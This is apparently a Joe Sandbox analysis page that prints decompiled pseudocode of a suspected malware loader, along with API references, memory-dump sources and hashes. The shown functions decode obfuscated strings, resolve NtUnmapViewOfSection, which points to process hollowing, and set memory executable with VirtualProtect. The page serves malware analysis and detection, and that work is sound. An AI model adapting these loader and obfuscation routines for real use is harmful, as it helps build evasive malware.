                                                                                                                                                                          Function 009F3470 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104librarymemoryloaderCOMMONCrypto
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 250 9f3470-9f34e7 call 9f8a10 call 9f3090 255 9f34e8-9f3512 250->255 255->255 256 9f3514-9f352d 255->256 257 9f3532-9f355c 256->257 257->257 258 9f355e-9f35b2 GetModuleHandleA GetProcAddress VirtualProtect call 9f8a50 257->258
                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                          			E009F3470(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* _a4, long _a8, long _a12, signed int _a16, void* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a80, intOrPtr _a88, intOrPtr _a92, signed int _a100) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v26;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t39;
				struct HINSTANCE__* _t58;
				void* _t86;
				signed char _t89;
				signed char _t90;
				CHAR* _t101;

				_t86 = __edx;
				_t101 =  &_v32;
				asm("cdq");
				_t39 = E009F8A10(_a12 * 0x101c, __edx, _a24, _a28);
				asm("sbb esi, ecx");
				asm("adc esi, [esp+0x58]");
				E009F3090(0x19c, 0xa45bc0, _t39 - _a16 * 0x19c + _a24, _t39 - _a16 * 0x19c + _a24, _t86);
				_v40 = 0x393a5418;
				_t89 = 0;
				_v36 = 0x396c5035;
				_v32 = 0xdac82ae4;
				_v28 = 0xfdb;
				_v26 = 0x68;
				do {
					_t101[_t89 + 0x10] = ((0x00000067 - ( !(_t101[_t89 + 0x10] + _t89) ^ _t89) ^ 0x00000062) + _t89 ^ _t89 ^ 0x000000b7) - _t89 + _t89 + 0x00000001 ^ _t89;
					_t89 = _t89 + 1;
				} while (_t89 < 0xf);
				_v32 = 0xd911bffe;
				_t90 = 0;
				_v28 = 0x587819be;
				_v24 = 0x99581f00;
				_v20 = 0xc6;
				do {
					asm("rol cl, 0x3");
					asm("ror cl, 0x3");
					asm("rol al, 0x3");
					_t101[_t90] =  !(0x000000ad -  ~((0x00000097 - (_t101[_t90] ^ 0x000000b2) ^ _t90) - _t90 ^ 0x00000029) ^ 0x00000073);
					_t90 = _t90 + 1;
				} while (_t90 < 0xd);
				_t58 = GetModuleHandleA(_t101);
				_a12 = 0;
				 *0xa45a80 = GetProcAddress(_t58,  &_v16);
				VirtualProtect(_a4, _a8, 0x40,  &_a12); // executed
				return E009F8A50(_a80, 0, _a88, _a92) ^ _a100;
			}

















                                                                                                                                                                          0x009f3470
                                                                                                                                                                          0x009f3470
                                                                                                                                                                          0x009f3482
                                                                                                                                                                          0x009f3489
                                                                                                                                                                          0x009f34a9
                                                                                                                                                                          0x009f34b4
                                                                                                                                                                          0x009f34ba
                                                                                                                                                                          0x009f34c1
                                                                                                                                                                          0x009f34c9
                                                                                                                                                                          0x009f34cb
                                                                                                                                                                          0x009f34d3
                                                                                                                                                                          0x009f34db
                                                                                                                                                                          0x009f34e2
                                                                                                                                                                          0x009f34e8
                                                                                                                                                                          0x009f350a
                                                                                                                                                                          0x009f350e
                                                                                                                                                                          0x009f350f
                                                                                                                                                                          0x009f3514
                                                                                                                                                                          0x009f351b
                                                                                                                                                                          0x009f351d
                                                                                                                                                                          0x009f3525
                                                                                                                                                                          0x009f352d
                                                                                                                                                                          0x009f3532
                                                                                                                                                                          0x009f353d
                                                                                                                                                                          0x009f3549
                                                                                                                                                                          0x009f354e
                                                                                                                                                                          0x009f3555
                                                                                                                                                                          0x009f3558
                                                                                                                                                                          0x009f3559
                                                                                                                                                                          0x009f3562
                                                                                                                                                                          0x009f356c
                                                                                                                                                                          0x009f3580
                                                                                                                                                                          0x009f3590
                                                                                                                                                                          0x009f35b2

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(-00000053), ref: 009F3562
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 009F3576
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 009F3590
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 009F35A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual__aulldiv
                                                                                                                                                                          • String ID: 5Pl9$`get$h
                                                                                                                                                                          • API String ID: 2761706316-1592696037
                                                                                                                                                                          • Opcode ID: 59634f4dcffa8794f907fc6a726d443395df6bed00a027ec3eabfde3cf94d202
                                                                                                                                                                          • Instruction ID: 6ac19ef0af6b9144db276c2ec6a88715fe5038af13932c506fcc70a298641fc8
                                                                                                                                                                          • Opcode Fuzzy Hash: 59634f4dcffa8794f907fc6a726d443395df6bed00a027ec3eabfde3cf94d202
                                                                                                                                                                          • Instruction Fuzzy Hash: 04311479008740AFEB158F35C954BABBFE5EBDA344F10991CF69483262C238850ADF63
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F9307 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E009F9307() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E009F9313); // executed
				return _t1;
			}




                                                                                                                                                                          0x009f930c
                                                                                                                                                                          0x009f9312

                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00009313,009F8B93), ref: 009F930C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                          • Opcode ID: 7046e6f43816d301c6f67f17fb68d8c56fd0f030d4bf08527d1515c19ec8d676
                                                                                                                                                                          • Instruction ID: b1928825b1545430bd8fb3d97b0d2aca00e3879179b424adb0e8539e0124c82c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7046e6f43816d301c6f67f17fb68d8c56fd0f030d4bf08527d1515c19ec8d676
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F5FD0 Relevance: 14.9, APIs: 4, Strings: 4, Instructions: 859libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                          			E009F5FD0(signed char __ebx, void* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a5236687, intOrPtr _a5236691, intOrPtr _a21741187, intOrPtr _a21741191) {
				intOrPtr _v16;
				void* _v32;
				void* _v56;
				intOrPtr _v76;
				void* _v80;
				void* _v100;
				char _v113;
				char _v117;
				char _v120;
				intOrPtr _v137;
				intOrPtr _v140;
				intOrPtr _v141;
				void* _v142;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				struct HINSTANCE__* _t214;
				intOrPtr _t216;
				signed int _t223;
				signed char _t230;
				intOrPtr _t232;
				intOrPtr _t236;
				signed int _t251;
				void* _t257;
				signed char _t270;
				signed int _t275;
				signed char _t368;
				signed char _t439;
				void* _t440;
				signed char _t461;
				intOrPtr _t462;
				signed int _t465;
				intOrPtr _t467;
				intOrPtr _t468;
				signed int _t477;
				signed char _t486;
				void* _t496;
				signed int _t502;
				signed char _t531;
				signed int _t542;
				intOrPtr _t596;
				intOrPtr _t597;
				intOrPtr _t598;
				void* _t599;
				void* _t600;
				void* _t601;
				signed char _t615;
				signed char _t620;
				signed char _t621;
				signed char _t629;
				signed char _t630;
				signed char _t708;
				void* _t711;
				intOrPtr _t712;
				void* _t713;
				void* _t714;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t718;
				void* _t719;
				void* _t720;
				void* _t721;
				void* _t722;

				_t717 = __ebp;
				_t714 = __esi;
				_t711 = __edi;
				_t439 = __ebx;
				_t722 = _t721 - 0x98;
				_t214 = GetModuleHandleA("ntdll.dll");
				if(_t214 != 0xffffffff) {
					GetProcAddress(_t214, "NtUnmapViewOfSection");
				} else {
					_push("Could not get a handle to ntdll.dll.");
					_push(0xa45c80);
					E009F1410(__ebx, __ebp, E009F1150(__ebx, __edi, __esi));
					_t722 = _t722 + 0xc;
				}
				asm("xorps xmm0, xmm0");
				_push(_t439);
				_push(_t717);
				_push(_t714);
				_v141 = 0xa7413dab;
				_v137 = 0x47464575;
				asm("movups [esp+0x1f], xmm0");
				_v117 = 0;
				_v113 = 0;
				_push(_t711);
				while(1) {
					L4:
					_t715 =  *0xa45a98; // 0x0
					_t712 =  *0xa45a9c; // 0x0
					while(1) {
						_t461 = 0;
						while(1) {
							L6:
							_v152 = _t461;
							if(_t461 >= 0x1d) {
								break;
							}
							_t439 =  *(_t722 + _t461 + 0x1b);
							_v148 = _t439 & 0x000000ff;
							asm("o16 nop [eax+eax]");
							L8:
							while(_t715 <= _t461) {
								_t10 = _t712 + 1; // 0x1
								_t719 = _t10;
								if(_t715 >= _t719) {
									if(__eflags == 0) {
										_t461 = _t461 + ( *(_t722 + _t461 + 0x1b) & 0x000000ff) + _t712 + 1;
										goto L6;
									} else {
										_t13 = _t712 + 2; // 0x2
										__eflags = _t715 - _t13;
										if(_t715 == _t13) {
											_t180 = _t461 - 0x4aeb3184; // -1256927620
											__eflags = _t439 + _t180 - (_v148 & _t180) + (_v148 & _t180) - 0x64;
											goto L124;
										} else {
											_t14 = _t712 + 4; // 0x4
											__eflags = _t715 - _t14;
											if(_t715 == _t14) {
												_t477 = _t461 + 0x5b2dc644;
												__eflags = _t477;
												_t257 = 0x12;
												goto L121;
											} else {
												_t15 = _t712 + 5; // 0x5
												__eflags = _t715 - _t15;
												if(_t715 == _t15) {
													_t169 = _t461 + 0x3d3618dc; // 0x3d3618dc
													_t615 = _t439 + _t169 - (_v148 & _t169) + (_v148 & _t169) - 4;
													__eflags = _t615;
													goto L119;
												} else {
													_t16 = _t712 + 6; // 0x6
													__eflags = _t715 - _t16;
													if(__eflags == 0) {
														_t163 = _t461 - 0x5c; // -92
														_t620 = _t163;
														_t270 = _t439 & _t620;
														_t621 = _t620 - 0x7c;
														__eflags = _t621;
														goto L115;
													} else {
														goto L16;
													}
												}
											}
										}
									}
								} else {
									_t11 = _t461 - 0xefbd6b4; // -251385524
									_t630 = _t11 - (_t11 & _v148) + (_t11 & _v148) - 0x14 + _t439;
									L16:
									_t439 = _t461;
									asm("o16 nop [eax+eax]");
									L17:
									while(_t712 <= _t461) {
										_t17 = _t712 + 0x40; // 0x40
										if(_t715 >= _t17) {
											__eflags = _t715 - _t719;
											if(__eflags == 0) {
												goto L117;
											} else {
												_t22 = _t712 + 2; // 0x2
												_t720 = _t22;
												__eflags = _t715 - _t720;
												if(__eflags == 0) {
													_t439 = _t439 + 4 - (_t439 & _t439 + 0x00000004) + (_t439 & _t439 + 0x00000004) - 0x1c + _t439 + 4 - (_t439 & _t439 + 0x00000004) + (_t439 & _t439 + 0x00000004) - 0x1c;
													_t461 = _t461 - 1 + 1;
													goto L6;
												} else {
													_t23 = _t712 + 3; // 0x3
													__eflags = _t715 - _t23;
													if(__eflags == 0) {
														_t496 = 0x22;
														_t629 = _t439 + 0x64;
														__eflags = _t629;
														goto L109;
													} else {
														goto L23;
													}
												}
											}
										} else {
											_t19 = _t461 - 0x3aa89cc4; // -984128708
											_t20 = _t712 + 2; // 0x2
											_t720 = _t20;
											_t461 = _v152;
											_t630 = _t19 + 0x2e + _t439;
											L23:
											if(_t712 + _t715 <= _t461) {
												_t104 = _t712 + 4; // 0x4
												__eflags = _t715 - _t104;
												if(_t715 >= _t104) {
													_t112 = _t712 + 1; // 0x1
													__eflags = _t715 - _t112;
													if(__eflags != 0) {
														__eflags = _t715 - _t720;
														if(__eflags != 0) {
															_t120 = _t712 + 5; // 0x5
															__eflags = _t715 - _t120;
															if(_t715 != _t120) {
																_t121 = _t712 + 9; // 0x9
																__eflags = _t715 - _t121;
																if(__eflags != 0) {
																	goto L77;
																} else {
																	_t439 = _t439 + 0x38;
																	_t630 = 0x3c - (_t439 & _t439) + 0x3c - (_t439 & _t439) + _t439 + _t439;
																	goto L117;
																}
															} else {
																_t477 = _t461 + 0x12d010d8;
																_t257 = 0xc;
																L121:
																_t615 = _t477 + _t257 - (_v148 & _t477) + _t257 - (_v148 & _t477) + _t439;
																__eflags = _t615;
																goto L122;
															}
														} else {
															_t630 = _t461 + 0x4ebf6ba8 + 0x34 - (_v148 & _t461 + 0x4ebf6ba8) + 0x34 - (_v148 & _t461 + 0x4ebf6ba8) + _t439;
															goto L110;
														}
													} else {
														_t114 = _t461 - 0x75513988; // -1968257416
														_t630 = _t439 + _t114 - (_v148 & _t114) + (_v148 & _t114) - 0x48;
														_t461 = _t461 + ( *(_t722 + _t461 + 0x1b) & 0x000000ff) + _t712 + 1;
														goto L6;
													}
												} else {
													_t531 = _t461 + 0xf104294c;
													_t461 = _v152;
													_t630 = _t439 + _t531 - (_t531 & _v148) + (_t531 & _v148) - 0x14;
													__eflags = _t630;
													L77:
													__eflags = _t712 + _t715 - 0x400;
													if(__eflags == 0) {
														_t155 = _t461 - 0x3446e688; // -877061768
														_t156 = _t155 - (_v148 & _t155) + (_v148 & _t155) - 0x48; // -877061840
														_t630 = _t156;
														goto L111;
													} else {
														_t109 = _t712 + 0x1000; // 0x1000
														__eflags = _t715 - _t109;
														if(_t715 <= _t109) {
															_t122 = _t712 + 1; // 0x1
															__eflags = _t715 - _t122;
															if(__eflags != 0) {
																__eflags = _t715 - _t720;
																if(__eflags != 0) {
																	_t128 = _t712 + 4; // 0x4
																	__eflags = _t715 - _t128;
																	if(__eflags != 0) {
																		_t132 = _t712 + 6; // 0x6
																		__eflags = _t715 - _t132;
																		if(_t715 != _t132) {
																			goto L65;
																		} else {
																			_t133 = _t461 + 0x44; // 0x44
																			_t629 = _t133;
																			_t496 = 0x12;
																			L109:
																			_t630 = _t629 + _t496 - (_t439 & _t629) + _t496 - (_t439 & _t629) + _t439;
																			__eflags = _t630;
																			L110:
																			_t461 = _v152;
																			L111:
																			_t712 = _t712 + 1;
																			_t439 = _t439 - 0x3c - (_t439 - 0x0000003c & _t439 - 0x0000003c) + (_t439 - 0x0000003c & _t439 - 0x0000003c) - 0x5c + _t439 - 0x3c - (_t439 - 0x0000003c & _t439 - 0x0000003c) + (_t439 - 0x0000003c & _t439 - 0x0000003c) - 0x5c;
																			 *(_t722 + _t461 + 0x1b) = _t439;
																			_t461 = _t461 - (_t439 & 0x000000ff) + _t712;
																			_v152 = _t461;
																			goto L124;
																		}
																	} else {
																		_t130 = _t461 - 0x9e0de84; // -165731972
																		_t615 = _t439 + _t130 - (_v148 & _t130) + (_v148 & _t130) - 0x64;
																		goto L119;
																	}
																} else {
																	_t126 = _t461 + 0x1416cee4; // 0x1416cee4
																	_t630 = _t439 + _t126 - (_v148 & _t126) + (_v148 & _t126) - 0x3c;
																	_t461 = _t461 - 1 + 1;
																	goto L6;
																}
															} else {
																_t630 = _t461 + 0x500629b4 + 0xa - (_v148 & _t461 + 0x500629b4) + 0xa - (_v148 & _t461 + 0x500629b4) + _t439;
																goto L117;
															}
														} else {
															_t111 = _t461 + 0x6dfdd71c; // 0x6dfdd71c
															_t630 = _t111 + 0x1e + _t439;
															goto L65;
														}
													}
												}
												goto L146;
											} else {
												while(1) {
													_t25 = _t712 + 8; // 0x8
													if(_t715 == _t25) {
														break;
													}
													_t26 = _t712 + 0xa; // 0xa
													if(_t715 == _t26) {
														_t712 = _t712 + 1;
														_t630 = _t461 + 0x71d21140 + 0x20 - (_v148 & _t461 + 0x71d21140) + 0x20 - (_v148 & _t461 + 0x71d21140) + _t439;
														_t461 = _v152 - 1 + 1;
														goto L6;
													} else {
														_t27 = _t712 + 0x20; // 0x20
														if(_t715 == _t27) {
															_t630 = _t461 + 0x53da63d8 + 0xc - (_v148 & _t461 + 0x53da63d8) + 0xc - (_v148 & _t461 + 0x53da63d8) + _t439;
															_t461 = _v152 - 1 + 1;
															goto L6;
														} else {
															_t28 = _t712 + 0x40; // 0x40
															if(_t715 == _t28) {
																_t94 = _t461 + 0x35e2b670; // 0x35e2b670
																_t615 = _t439 + _t94 - (_v148 & _t94) + (_v148 & _t94) - 0x10;
																goto L119;
															} else {
																_t29 = _t712 + 0x64; // 0x64
																if(_t715 == _t29) {
																	_t90 = _t461 + 0x17eb0908; // 0x17eb0908
																	_t368 = _t90;
																	_t477 = (_v148 & _t368) + (_v148 & _t368);
																	_t615 = _t439 + _t368 - _t477 - 0x38;
																	goto L122;
																} else {
																	_t30 = _t712 + 0x200; // 0x200
																	if(_t715 == _t30) {
																		_t542 = _t461 - 0x60;
																		_t630 = _t439;
																		_v152 = _v152 + (_t542 | 0xffffffff) - (_t630 & 0x000000ff);
																		_t461 = _v152 + 1;
																		goto L6;
																	} else {
																		_t31 = _t712 + 0x400; // 0x400
																		if(_t715 == _t31) {
																			_t83 = _t461 + 0x68; // 0x68
																			_t630 = _t83 + 0x14;
																			_t461 = _v152 + ( *(_t722 + _v152 + 0x1b) & 0x000000ff) + _t712 + 1;
																			goto L6;
																		} else {
																			_t32 = _t712 + 0x61; // 0x61
																			if(_t715 == _t32) {
																				continue;
																			} else {
																				_t33 = _t712 + 0x7a; // 0x7a
																				_t715 = _t33;
																				_t34 = _t715 + 0x41; // 0xbb
																				_t712 = _t34;
																				_t35 = _t712 + 0x5a; // 0x115
																				if(_t715 < _t35) {
																					_t630 = _t439;
																					goto L4;
																				} else {
																					_t36 = _t712 + 1; // 0xbc
																					_t719 = _t36;
																					if(_t715 < _t719) {
																						_t630 = _t439;
																						_t461 = 0;
																						goto L6;
																					} else {
																						_t37 = _t712 + 3; // 0xbe
																						if(_t715 < _t37) {
																							_t56 = _t461 + 0x14; // 0x14
																							_t630 = _t56 + 0x3a;
																							_t461 = _v152;
																							goto L8;
																						} else {
																							_t38 = _t712 + 5; // 0xc0
																							if(_t715 < _t38) {
																								_t439 = _t461;
																								_t630 = _t439 - 0x54 + 0x26;
																								_t461 = _v152;
																								goto L17;
																							} else {
																								_t39 = _t712 + 8; // 0xc3
																								if(_t715 < _t39) {
																									_t78 = _t461 + 0x74; // 0x74
																									_t630 = _t78 - 0x2c + _t439 - (_t439 & _t78) + (_t439 & _t78);
																									__eflags = _t630;
																									L65:
																									__eflags = _t715 - 0x20;
																									if(__eflags >= 0) {
																										_t461 = _v152;
																										_t615 = _v152 + 0xe9b0c6e0 + _t439 - (_v148 & _v152 + 0xe9b0c6e0) + (_v148 & _v152 + 0xe9b0c6e0) - 0x20 + _t439;
																										goto L119;
																									} else {
																										_t79 = _t712 + 0x28; // 0x28
																										__eflags = _t715 - _t79;
																										if(_t715 <= _t79) {
																											_t134 = _t712 + 1; // 0x1
																											__eflags = _t715 - _t134;
																											if(__eflags != 0) {
																												_t141 = _t712 + 5; // 0x5
																												__eflags = _t715 - _t141;
																												if(__eflags != 0) {
																													_t143 = _t712 + 4; // 0x4
																													__eflags = _t715 - _t143;
																													if(__eflags != 0) {
																														_t145 = _t712 + 3; // 0x3
																														__eflags = _t715 - _t145;
																														if(__eflags != 0) {
																															_t148 = _t712 + 2; // 0x2
																															__eflags = _t715 - _t148;
																															if(_t715 != _t148) {
																																goto L62;
																															} else {
																																_t621 = _v152 + 0xffffffb0;
																																_t486 = 0x18 - (_t439 & _t621) + 0x18 - (_t439 & _t621) + _t439;
																																goto L116;
																															}
																														} else {
																															_t712 = _t712 + 1;
																															_t630 = _v152 + 0x44;
																															_t461 = _v152 - 1 + 1;
																															goto L6;
																														}
																													} else {
																														_t439 = _t439 - 0x80 - (_t439 & _t439 - 0x00000080) + (_t439 & _t439 - 0x00000080) - 0x80 + _t439 - 0x80 - (_t439 & _t439 - 0x00000080) + (_t439 & _t439 - 0x00000080) - 0x80;
																														_t461 = _v152 - 1 + 1;
																														_t630 = _t439;
																														goto L6;
																													}
																												} else {
																													_t461 = _v152;
																													_t439 = _t439 - 0x18;
																													_t615 = _t439 - (_t439 & _t439) + (_t439 & _t439) - 0x58 + _t439;
																													goto L119;
																												}
																											} else {
																												_t630 = _v152 + 0x155d8cf0 + 0x38 - (_v148 & _v152 + 0x155d8cf0) + 0x38 - (_v148 & _v152 + 0x155d8cf0) + _t439;
																												_t461 = _v152 + ( *(_t722 + _v152 + 0x1b) & 0x000000ff) + _t712 + 1;
																												goto L6;
																											}
																										} else {
																											_t630 = _t439 + _v152 + 0x33553a58 - (_v148 & _v152 + 0x33553a58) + (_v148 & _v152 + 0x33553a58) - 0x68;
																											goto L62;
																										}
																									}
																									goto L146;
																								} else {
																									_t40 = _t712 + 0xa; // 0xc5
																									if(_t715 < _t40) {
																										_t74 = _t461 + 0xc; // 0xc
																										_t630 = _t74 - 0x54 + _t439 - (_t439 & _t74) + (_t439 & _t74);
																										__eflags = _t630;
																										L62:
																										__eflags = _t712 - 3;
																										if(__eflags < 0) {
																											goto L60;
																										} else {
																											_t630 = _v152 + 0x7a87448 + 4 - (_v148 & _v152 + 0x07a87448) + 4 - (_v148 & _v152 + 0x07a87448) + _t439 + _v152 + 0x7a87448 + 4 - (_v148 & _v152 + 0x07a87448) + 4 - (_v148 & _v152 + 0x07a87448) + _t439;
																											goto L117;
																										}
																										L146:
																									} else {
																										_t41 = _t712 + 0x20; // 0xdb
																										if(_t715 < _t41) {
																											_t439 = _t439 - (_t439 & _t461 - 0x0000005c) + (_t439 & _t461 - 0x0000005c) - 0x7c + _t461 - 0x5c;
																											__eflags = _t439;
																											_t630 = _t439;
																											L60:
																											_t502 = _v152;
																											 *(_t722 + _t502 + 0x1b) = _t630;
																											_t461 = _t502 + 1;
																											goto L6;
																										} else {
																											_t42 = _t712 + 0x40; // 0xfb
																											if(_t715 < _t42) {
																												continue;
																											} else {
																												_t43 = _t712 + 0x42; // 0xfd
																												_t715 = _t43;
																												_t44 = _t715 + 0x64; // 0x161
																												_t712 = _t44;
																												_t45 = _t712 + 0x80; // 0x1e1
																												if(_t715 > _t45) {
																													_t67 = _t461 + 0x20; // 0x20
																													_t630 = _t67 + 0x10;
																													_t461 = _v152 + ( *(_t722 + _v152 + 0x1b) & 0x000000ff) + _t712 + 1;
																													goto L6;
																												} else {
																													_t46 = _t712 + 0x3e8; // 0x549
																													if(_t715 > _t46) {
																														_t65 = _t461 - 0x48; // -72
																														_t630 = _t65 + _t439 - (_t439 & _t65) + (_t439 & _t65) - 8;
																														_t461 = _v152;
																														L124:
																														_t715 = _t715 + 1;
																														_t251 = _v152;
																														 *((char*)(_t722 + _t251 + 0x1b)) = _t461 + 0x10 - (_t461 + 0x00000010 & _t439) + (_t461 + 0x00000010 & _t439) - 0x70 + _t439;
																														_t461 = _v152 + (_t251 | 0xffffffff) - _t715 + ( *(_t722 + _v152 + (_t251 | 0xffffffff) - _t715 + 0x1b) & 0x000000ff) + _t712 + 1;
																														goto L6;
																													} else {
																														_t47 = _t712 + 0x1000; // 0x1161
																														if(_t715 > _t47) {
																															_t477 = _t461 - 0x80;
																															_t615 = _t439;
																															goto L122;
																														} else {
																															_t48 = _t712 + 0x7a; // 0x1db
																															if(_t715 > _t48) {
																																_t63 = _t461 + 0x18; // 0x18
																																_t615 = _t63 + 0x2c;
																																_t461 = _v152;
																																L119:
																																_t477 = _t461 + 0x2c - (_t461 + 0x0000002c & _t439) + (_t461 + 0x0000002c & _t439) - 0x34 + _t439 + _t615;
																																 *(_t722 + _v152 + 0x1b) = _t477;
																																L122:
																																_t715 = _t715 + _t712;
																																_v152 = _v152 + (_t477 | 0xffffffff) - (_t615 & 0x000000ff);
																																_t461 = _v152 + 1;
																																goto L6;
																															} else {
																																_t49 = _t712 + 0x5a; // 0x1bb
																																if(_t715 > _t49) {
																																	_t61 = _t461 - 0x50; // -80
																																	_t630 = _t61 + 0x18;
																																	_t461 = _v152 - 1 + 1;
																																	goto L6;
																																} else {
																																	_t50 = _t712 + 1; // 0x162
																																	if(_t715 > _t50) {
																																		_t59 = _t461 + 0x48; // 0x48
																																		_t712 = _t712 + 1;
																																		_t630 = _t59 + 4;
																																		_t461 = _v152 - 1 + 1;
																																		goto L6;
																																	} else {
																																		_t51 = _t712 + 3; // 0x164
																																		if(_t715 > _t51) {
																																			_t58 = _t461 - 0x20; // -32
																																			_t708 = _t58;
																																			_t270 = _t439 & _t708;
																																			_t621 = _t708 - 0x20;
																																			L115:
																																			_t486 = _t439 - _t270 + _t270;
																																			__eflags = _t486;
																																			L116:
																																			__eflags = _t621 + _t486;
																																			L117:
																																			_t275 = _v152;
																																			 *((char*)(_t722 + _t275 + 0x1b)) = _v152 - 0x6c - (_v152 - 0x0000006c & _t439) + (_v152 - 0x0000006c & _t439) - 0xc + _t439;
																																			_t712 = _t712 + 1;
																																			_t461 = _t275 - 1 + 1;
																																			goto L6;
																																		} else {
																																			_t52 = _t712 + 5; // 0x166
																																			if(_t715 <= _t52) {
																																				_t53 = _t712 + 6; // 0x167
																																				_t715 = _t53;
																																				_t54 = _t715 + 3; // 0x16a
																																				_t712 = _t54;
																																			}
																																			continue;
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L131;
												}
												_t630 = _t461 + 0x8fc9bea8 + 0x34 - (_v148 & _t461 + 0x8fc9bea8) + 0x34 - (_v148 & _t461 + 0x8fc9bea8) + _t439;
												goto L117;
											}
										}
										goto L131;
									}
									_t216 = _a21741187;
									_t462 = _a21741191;
								}
								L131:
								E009F2EF0(_t439, 0xa45bc0, _t712, _t216);
								GetCurrentProcess(); // executed
								FreeConsole(); // executed
								E009F1E20(_t439,  &_v120, _t712, __eflags, _t462);
								_t596 = _v16;
								_pop(_t713);
								_pop(_t716);
								_pop(_t718);
								_pop(_t440);
								__eflags = _t596 - 0x10;
								if(_t596 < 0x10) {
									L135:
									_t597 =  *((intOrPtr*)(_t722 + 0x64));
									__eflags = _t597 - 0x10;
									if(_t597 < 0x10) {
										L139:
										_t598 = _v76;
										__eflags = _t598 - 0x10;
										if(_t598 < 0x10) {
											L143:
											E009F5BF0(_t440, _t713, _t716, _t718);
											__eflags = 0;
											return 0;
										} else {
											_t465 =  *(_t722 + 0x38);
											_t599 = _t598 + 1;
											_t223 = _t465;
											__eflags = _t599 - 0x1000;
											if(_t599 < 0x1000) {
												L142:
												_push(_t599);
												E009F89FD(_t465);
												_t722 = _t722 + 8;
												goto L143;
											} else {
												_t465 =  *(_t465 - 4);
												_t599 = _t599 + 0x23;
												__eflags = _t223 - _t465 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L144;
												} else {
													goto L142;
												}
											}
										}
									} else {
										_t467 =  *((intOrPtr*)(_t722 + 0x50));
										_t600 = _t597 + 1;
										_t232 = _t467;
										__eflags = _t600 - 0x1000;
										if(_t600 < 0x1000) {
											L138:
											_push(_t600);
											E009F89FD(_t467);
											_t722 = _t722 + 8;
											goto L139;
										} else {
											_t465 =  *(_t467 - 4);
											_t599 = _t600 + 0x23;
											__eflags = _t232 - _t465 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L144;
											} else {
												goto L138;
											}
										}
									}
								} else {
									_t468 =  *((intOrPtr*)(_t722 + 0x7c));
									_t601 = _t596 + 1;
									_t236 = _t468;
									__eflags = _t601 - 0x1000;
									if(_t601 < 0x1000) {
										L134:
										_push(_t601);
										E009F89FD(_t468);
										_t722 = _t722 + 8;
										goto L135;
									} else {
										_t465 =  *(_t468 - 4);
										_t599 = _t601 + 0x23;
